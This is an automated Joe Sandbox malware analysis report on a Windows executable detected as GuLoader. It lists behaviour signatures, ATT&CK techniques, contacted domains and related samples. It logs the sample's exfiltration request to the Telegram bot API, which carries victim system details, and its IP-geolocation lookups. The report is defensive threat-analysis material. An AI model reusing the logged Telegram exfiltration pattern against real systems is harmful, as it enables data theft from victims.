      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeCode function: 0_2_004061A5 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_004061A5

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000009.00000002.2578808051.0000000025A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000009.00000002.2578808051.0000000025A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      11
      Masquerading
      OS Credential Dumping111
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      1
      Web Service
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts2
      PowerShell
      Boot or Logon Initialization Scripts311
      Process Injection
      31
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop Protocol1
      Clipboard Data
      11
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager31
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive3
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
      Process Injection
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture3
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA Secrets1
      System Network Configuration Discovery
      SSHKeylogging14
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Software Packing
      Cached Domain Credentials3
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSync14
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587700 Sample: RmIYOfX0yO.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 35 reallyfreegeoip.org 2->35 37 api.telegram.org 2->37 39 4 other IPs or domains 2->39 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Multi AV Scanner detection for dropped file 2->45 51 4 other signatures 2->51 8 RmIYOfX0yO.exe 31 2->8         started        signatures3 47 Tries to detect the country of the analysis system (by using the IP) 35->47 49 Uses the Telegram API (likely for C&C communication) 37->49 process4 file5 21 C:\Users\user\...\Storvildtjagten180.Agg, Unicode 8->21 dropped 23 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->23 dropped 53 Suspicious powershell command line found 8->53 12 powershell.exe 29 8->12         started        signatures6 process7 file8 25 C:\Users\user\AppData\...\RmIYOfX0yO.exe, PE32 12->25 dropped 27 C:\Users\...\RmIYOfX0yO.exe:Zone.Identifier, ASCII 12->27 dropped 55 Early bird code injection technique detected 12->55 57 Writes to foreign memory regions 12->57 59 Found suspicious powershell code related to unpacking or dynamic code loading 12->59 61 3 other signatures 12->61 16 msiexec.exe 15 8 12->16         started        19 conhost.exe 12->19         started        signatures9 process10 dnsIp11 29 api.telegram.org 149.154.167.220, 443, 50000 TELEGRAMRU United Kingdom 16->29 31 checkip.dyndns.com 158.101.44.242, 49983, 49986, 49988 ORACLE-BMC-31898US United States 16->31 33 3 other IPs or domains 16->33

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      RmIYOfX0yO.exe74%VirustotalBrowse
      RmIYOfX0yO.exe65%ReversingLabsWin32.Trojan.GuLoader
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll0%ReversingLabs
      C:\Users\user\AppData\Local\magmaet\clenched\RmIYOfX0yO.exe65%ReversingLabsWin32.Trojan.GuLoader
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://www.microsoft.cod0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      142.250.186.78
      truefalse
        high
        drive.usercontent.google.com
        142.250.186.33
        truefalse
          high
          reallyfreegeoip.org
          104.21.80.1
          truefalse
            high
            api.telegram.org
            149.154.167.220
            truefalse
              high
              checkip.dyndns.com
              158.101.44.242
              truefalse
                high
                checkip.dyndns.org
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://reallyfreegeoip.org/xml/8.46.123.189false
                    high
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                      high
                      http://checkip.dyndns.org/false
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.microsoft.copowershell.exe, 00000002.00000002.2178315725.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2188167978.0000000008022000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.usercontent.google.com/msiexec.exe, 00000009.00000002.2564635002.0000000009D48000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://checkip.dyndns.orgmsiexec.exe, 00000009.00000002.2578808051.0000000025B29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C02000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://nsis.sf.net/NSIS_ErrorErrorRmIYOfX0yO.exe, 00000000.00000000.1293647794.000000000040A000.00000008.00000001.01000000.00000003.sdmp, RmIYOfX0yO.exe, 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                                                high
                                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.google.commsiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://reallyfreegeoip.org/xml/8.46.123.189$msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://reallyfreegeoip.orgmsiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://reallyfreegeoip.orgmsiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/pscore6lBlqpowershell.exe, 00000002.00000002.2178786128.00000000048B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://apis.google.commsiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://checkip.dyndns.commsiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2178786128.00000000048B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.microsoft.codpowershell.exe, 00000002.00000002.2178315725.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://reallyfreegeoip.org/xml/msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          142.250.186.78
                                                                          drive.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          149.154.167.220
                                                                          api.telegram.orgUnited Kingdom
                                                                          62041TELEGRAMRUfalse
                                                                          158.101.44.242
                                                                          checkip.dyndns.comUnited States
                                                                          31898ORACLE-BMC-31898USfalse
                                                                          142.250.186.33
                                                                          drive.usercontent.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          104.21.80.1
                                                                          reallyfreegeoip.orgUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1587700
                                                                          Start date and time:2025-01-10 17:06:29 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 7m 54s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:11
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:RmIYOfX0yO.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:f5f3c3a8c7f9f5fb9531fa0d57012ce0869b52b23d05e6c9b7a0220ac917db6d.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.evad.winEXE@6/16@5/5
                                                                          EGA Information:
                                                                          • Successful, ratio: 33.3%
                                                                          HCA Information:
                                                                          • Successful, ratio: 96%
                                                                          • Number of executed functions: 155
                                                                          • Number of non-executed functions: 55
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target msiexec.exe, PID 1480 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 7472 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          TimeTypeDescription
                                                                          11:07:27API Interceptor39x Sleep call for process: powershell.exe modified
                                                                          11:09:15API Interceptor123x Sleep call for process: msiexec.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          149.154.167.220IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                            8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      https://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                                                        https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                          dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              158.101.44.2422V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              tx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              FORTUNE RICH_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • checkip.dyndns.org/
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              checkip.dyndns.comzAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 193.122.130.0
                                                                                              MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              b5JCISnBV1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 132.226.8.169
                                                                                              ql8KpEHT7y.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 193.122.6.168
                                                                                              8kDIr4ZdNj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 193.122.6.168
                                                                                              2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 158.101.44.242
                                                                                              tx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 158.101.44.242
                                                                                              New Order-090125.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                              • 132.226.247.73
                                                                                              4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 193.122.6.168
                                                                                              reallyfreegeoip.orgzAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.112.1
                                                                                              MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.112.1
                                                                                              8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 104.21.96.1
                                                                                              b5JCISnBV1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.16.1
                                                                                              ql8KpEHT7y.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.96.1
                                                                                              8kDIr4ZdNj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.16.1
                                                                                              2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 104.21.16.1
                                                                                              tx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 104.21.32.1
                                                                                              New Order-090125.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                              • 104.21.64.1
                                                                                              4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.96.1
                                                                                              api.telegram.orgIUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 149.154.167.220
                                                                                              PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              https://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 149.154.167.220
                                                                                              https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 149.154.167.220
                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              TELEGRAMRUIUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
